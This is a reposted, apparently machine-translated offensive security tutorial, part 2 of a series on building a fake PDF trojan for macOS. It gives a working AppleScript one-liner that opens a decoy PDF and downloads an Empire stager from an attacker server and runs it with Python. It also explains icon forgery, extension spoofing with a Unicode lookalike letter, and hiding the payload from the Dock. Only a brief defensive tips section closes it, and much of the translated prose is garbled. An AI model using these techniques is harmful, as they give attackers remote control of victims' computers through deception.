قالب وردپرس درنا توس
Home / Tips and Tricks / Creating a Fake PDF Trojan with AppleScript, Part 2 (Disguising the Script) «Null Byte :: WonderHowTo

Creating a Fake PDF Trojan with AppleScript, Part 2 (Disguising the Script) «Null Byte :: WonderHowTo



With the macOS stager created and the attacker's system hosting the Empire listener, the malicious AppleScript can be created with some Unicode and Icon manipulation tricks and disguised as a legal PDF.

This requires a real PDF attack on the work. Files larger than 1 MB in size may be too large and may make the target suspicious. The real PDF is downloaded each time the target opens the trojanised AppleScript (the fake PDF), so the real PDF should be just one page and small enough to download it quickly, otherwise the target might wonder why it's a few Seconds lasts The PDF file will be previewed if it is to be displayed immediately.

So far: Creating a Fake PDF Trojan Using AppleScript, Part 1 (Creating the Stager)

In this follow-up to the first part of further creating a malicious PDF for MacBooks, I'll show you how to get started fast PDF created with the Cover of a CompTIA Study Guide on AllITebooks, but a higher quality image should be used during a real scenario [19659005] Step 1: Copy a PDF Cover Image

Navigate in your web browser to a site where the PDF file is cloned. In my example, this is the CompTIA study guide to AllITebooks. You do not really need to download the PDF file, you just need the first image to appear in the preview, so right-click on it, choose "Save Image As" and save it with the title . jpg into the directory files /

Step 2: Install GIMP and open the image

In Um To manipulate the title image of PDF, we need GIMP, a popular image editing application that is completely free. To install it, use the command apt-get below.

  apt-get install gimp 

Once installed, open cover.jpg in GIMP with the following command.

  gimp cover.jpg 

Step 3: Export the cover sheet as PDF

Next, export the image to the "files /" directory by navigating to "File" and then "Export As". Change the file name to real.pdf and the file type to "Portable Document Format (* .pdf)"

Step 4: Change Canvas Size

Apple Icons must be perfectly symmetrical squares and the cover.jpg is rectangular. To fix the problem, navigate to the Picture button in GIMP and then edit the Canvas Size.

Width to reach the Height and clicking on "Resize", to save the changes. The new screen shows a ton of transparent space on the right side of the picture. To center the image, use the Align tool under Tools, then Transform Tools.

Left-click once on the image to select it, and then click the Center button. , Note that the translucent area is now on both sides of the cover photo, as shown below.

Step 5: Resizing the image

Now resize the image by clicking Navigate "Image" then "Scale Image" and then change the width and Height in 256

Step 6: Exporting the cover page in PNG format

Export the image again to the files / directory by navigating to "File", then "Export as." Change the file name to cover.png and the file type to "PNG Image (* .png)."

Step 7: Converting to ICNS Format

The final step for the images is to cover the cover .png in to convert Apple ICNS icon file format. To do this, you can upload the cover.png file to cloudconvert and click on the "Start conversion" button.

When the conversion is done, download the .icns file and save it in the files / directory. There should now be four files in the files / directory (you can do this with ls ).

  `/ tokyoneon ~ / files
> ls
cover.icns cover.jpg cover.png real.pdf 

The cover.jpg and cover.png were used as templates and are no longer needed. The real.pdf is a small PDF that is downloaded from the target each time the AppleScript (the fake PDF) is opened. The cover.icns is the Apple symbol file used in a later step.

That was & # 39; s for the Kali Linux end. To make the malicious AppleScript (fake PDF), I use the script editor in macOS High Sierra.

Step 8: Create the AppleScript

It should be possible to create trojanized AppleScripts with Kali, but it is a bit more involved than allowed in this article. To keep things simple, I use macOS with AppleScript version 2.7 and Script Editor version 2.10. If readers want a full Kali-Linux method, please leave a comment and I'll see what I can do.

First, copy the real PDF that is cloned to the macOS desktop. This allows the attacker to make a direct comparison when creating the forged PDF.

Then, look for Open Apple's built-in Spotlight, Launchpad, or Utilities folder under Applications "and copy the following script into the window. This is the single-line AppleScript that runs on the victim's MacBook when the fake PDF is double-clicked.

  do shell script "s = ATTACKER IP ADDRESS: PORT; curl -s $ s / real.pdf | open -f -a Preview.app & curl -s $ s / script | python -" 
  • The start of the script ( do shell script ) is the AppleScript directing the MacBook to execute the program following code
  • The server of the attacker is set as a variable ( s = ATTACKER -IP-ADDRESS: PORT ) and should be changed to the local IP address of the attacker. For example, s = 192.16.0.14: 8080 .
  • The real PDF is downloaded ( curl -s $ s / real.pdf ) from the server of the attacker, piped ([ | ) and opened ( open -fa Preview.app ) with the macOS Preview application.
  • Lastly, the Empire Stager, stored as a "script" on the attacker's server, is downloaded ( & curl -s $ s / script | python – ) and executed with Python on the victim's MacBook ,

Next, click "File" in the menu bar, then "Export" to start saving the AppleScript.

Exporting the desktop with the filename fake change the file format in "Application" and disable "Show startup screen".

Functionally speaking, the wrong P DF behaves as intended. But if you look at the two files side by side now, there is still a lot to do to make it look like the real PDF on the left.

Step 9: Change the Icon

As seen in GIF above, macOS becomes real for the file .pdf generally use the first page of PDF to generate the file icon. This can of course easily be faked with the previously created .icns. To change the icon, move the cover.icns file from the Kali system to the MacBook, right-click the fake file, and then choose "Get Info"

Then drag the cover.icns file into the Info window of fake to change the icon.

The AppleScript looks more like the real PDF. With a little patience, the crease in the top right corner of the icon, the outline of the icon, and the binder rings can be easily manipulated with GIMP and other photo editor tricks. The details of further spoofing the cover photo are a bit boring, so I'll keep going – you get the idea.

Step 10: Spoof the file extension with Unicode

The bigger problem is the filename. Ideally, an AppleScript with a PDF file extension is desired. But changing the file extension to .pdf causes macOS to display the AppleScripts true file extension.

As shown above, macOS automatically appends the .app extension. One way to get a convincing file extension is to use Unicode, a character encoding standard that provides a unique number for each character.

Unicode "U + 1E0B" is the Latin lowercase letter D with a dot above it and at a glance appears just like a normal "d" character.

Copying this character from the Wikipedia page and pasting into the AppleScript filename produces a much more convincing file extension.

At a glance, this difference could easily be mistaken for a specification of dust. On closer examination, the difference in the Latin "d" can be seen more clearly.

This is just one of many available Unicode characters used for such extension spoofing attacks and other types

Do not miss: How to easily generate hundreds of phishing domains

Step 11: Hide the Python script from the dock

Another problem with using AppleScripts has occurred this way, showing the dock after running the script with two new items.

One icon stands for Preview to show the real PDF, the other icon represents the malicious Python script that appears in the Background was executed. To fix this, right-click on the file fake.pdf and then on "Show package contents".

Navigate to "Contents" directory and open the file "Info.plist" in TextEdit. Add the following NSUIElement text to the Info.plist file.

   NSUIElement 
  1  

This is how it should look in TextEdit:

How to Protect yourself from AppleScript Attacks

If you want to make sure you do not have a malicious PDF like this on Open your MacBook or other Mac computer, there are some obvious things you can do to make this AppleScript payload more noticeable.

  • Do Not Double-Click Files . It is always best to explicitly choose which program to use when opening files. Right-click on the desired file and manually select an application from the "Open With" menu.
  • Show All File Name Extensions . This Unicode trick was tested with Finder's default settings, with Show All File Name Extensions disabled by default. To enable this setting, navigate to "Finder" in the menu bar, then "Settings" and activate the option on the "Advanced" tab.

There's going to be more in my Hacking MacOS series. In future articles I will explore vectors for delivering the fake .pdf files to unsuspecting macOS users, keyloggers after exploitation, keychain password dumping, webcam screenshots and more. My epic quest for the myth that macOS is safer than Windows 10 is not over yet.

Do not Miss: More Null-Byte Guides for Hacking MacOS [19659092] Cover Picture of Startup Photos / PEXELS; Screenshots of tokyoneon / Null Byte


Source link